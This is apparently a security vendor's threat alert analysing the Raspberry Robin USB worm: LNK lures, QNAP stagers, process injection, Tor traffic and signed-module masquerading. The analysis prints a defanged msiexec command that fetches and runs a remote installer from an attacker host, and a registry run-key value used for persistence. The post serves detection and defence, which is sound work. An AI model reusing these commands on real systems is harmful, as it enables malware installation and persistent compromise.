Distributed Machine Learning Models Done Right
In this article you’ll get an overview of the key challenges common to distributed Machine Learning (ML) architectures frequently seen in IOT devices and security solutions...
The Cybereason Global Security Operations Center (SOC) Team issues Cybereason Threat Alerts to inform customers of emerging impacting threats. The Alerts summarize these threats and provide practical recommendations for protecting against them.
The Cybereason team is investigating a series of recent infections with the Raspberry Robin campaign, also associated with the name “LNK Worm.” Raspberry Robin involves a worm that spreads over USB devices or shared folders, leveraging compromised QNAP (Network Attached Storage or NAS) devices as stagers. It uses an old but still effective method of using “LNK” shortcut files to lure its victims.
This section describes the different processes that we observed, involved in Raspberry Robin infections. The following diagram represents the overall malicious activity seen in a Raspberry Robin infection chain:
Summarized infection process for Raspberry Robin
The GSOC team summarizes a Raspberry Robin infection as follows :
Based on public samples we analyzed (i.e. MD5 hash 22531e030b05dbaafe9932b8779c73f6), the initial set of two files can be present on an external storage device or simply in a compressed archive. It contains:
Example content of the public sample 22531e030b05dbaafe9932b8779c73f6
Process cmd.exe taking content of “WYcZ.CFg” file as an input to execute “process msiexec.exe” as seen in the Cybereason Defense Platform
The fact that the initial “cmd.exe” spawns from the “explorer.exe” process is the result of “LNK” files execution.
The initial infection vector launches “msiexec.exe” with a full malicious URL as an argument as well as “[/-]q” (quiet mode) and “[/-]i” (normal installation mode). Amongst the different attacks observed, the arguments are ordered differently and use different patterns, for example with or without a space.
An example pattern for this command is:
msIEXeC -Q/i ""htTP://6y[.]RE:8080/5CBniie70Rw/[Machine name]=[Victim user name]" (where the machine name and victim name are replaced by actual values).
As the normal installation proceeds, the msiexec.exe command listed above creates another msiexec.exe /V process, launched from services.exe.
This second msiexec.exe /V process then spawns a third msiexec.exe process, which loads a malicious module named msi[...].tmp and is the malware stage downloaded from its parent msiexec.exe /V process:
Process “msiexec.exe” downloading content from the domain “6y[.]re” pointing to a QNAP compromised device as seen in the Cybereason Defense Platform
Extract from “https://www.shodan.io/host/195.158.67.252”, showing that the server that resolves from “6y[.]re” is a QNAP device with a service hosted on TCP port 8080
The next step for this threat is to inject itself into other processes, namely “rundll32.exe,” “dllhost.exe” and “regsvr32.exe” on the observed victims. The Cybereason Defense Platform detects this injection and can help to link the creator process and the created ones.
The number of injected system processes is generally high (between 50 and 300) and some of these processes communicate with TOR (The Onion Router) exit nodes:
Raspberry Robin injecting system processes, which then communicate with TOR-related IP addresses, as seen in the Cybereason Defense Platform
Raspberry Robin installs itself into a registry “run” key in the Windows user’s hive, for example:
“Hku\[GUID]\software\microsoft\windows\currentversion\runonce\vayp” with value “RUNDLL32 SHELL32.DLL,ShellExec_RunDLLA REGSVR32.EXE /u -S "C:\Users\[UserName]\AppData\Local\Temp\cnsbi.mh."
As a result, “rundll32.exe” loads the same DLL as the one which the initial “msiexec.exe” process downloaded in the infection stage. It then proceeds with the same process injection and communication as described above.
The loaded DLL has a random extension (pi.loc, cr.mf, etc.) and “rundll32.exe” loads it with a “.” at the end:
Process tree showing the persistence mechanisms used by Raspberry Robin as seen in the Cybereason Defense Platform
Regarding the persistence aspects, the following diagram represents the way the malicious module executes at each machine startup:
Raspberry Robin persistence process following an initial infection and running at each machine boot
As the malicious module is the same one as during the initial infection process, it displays the same malicious activities involving process injection and communication with Tor exit nodes.
This module contains specific indicators, including the fact that it masquerades as an Apache shared library (DLL) called “libapriconv-1.dll”:
Raspberry Robin leverages malicious module loading masquerading as Apache shared libraries (DLL)
The other samples the GSOC team identified on other Raspberry Robin cases also use different masquerading processes (for instance, impersonating “QT 5”).
This specific module is also peculiar due to the fact that the chain of certification is broken, making it signed but not verified by the Windows system. The code signing name is “OmniContact” and can be used as a filter on VirusTotal.com to check for similar samples.
Excerpt from virustotal.com showing a sample detailed information
In 75% of the observed victims, the malicious module downloaded by Raspberry Robin was signed by “OmniContact.”
Finally, the victim devices of Raspberry Robin created a high amount of network packets to TOR exit nodes. The GSOC team observed that the TCP ports used were 80, 443 and 8080.
The Cybereason Defense Platform detects and prevents Raspberry Robin infections in Microsoft products. Cybereason recommends the following:
The Cybereason Defense Platform detects Raspberry Robin initial access method
The Cybereason Defense Platform detects the Raspberry Robin malicious module loading
Looking for the IOCs? Open the chatbot on the bottom right corner of your screen to access the Raspberry Robin IOCs.
Loïc Castel, Principal Security Analyst, Cybereason Global SOC
Loïc Castel is a Principal Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches critical incidents and cybercriminals, in order to better detect compromises. In his career, Loïc worked as a security auditor in well-known organizations such as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics & Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive aspects such as vulnerability research.
The Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.
All Posts by Cybereason Global SOC Team
In this article you’ll get an overview of the key challenges common to distributed Machine Learning (ML) architectures frequently seen in IOT devices and security solutions...
This supply chain attack targets to compromise the integrity of Secure Shell (SSH) - a cryptographic network protocol used to operate systems using remote command execution over an unsecured network.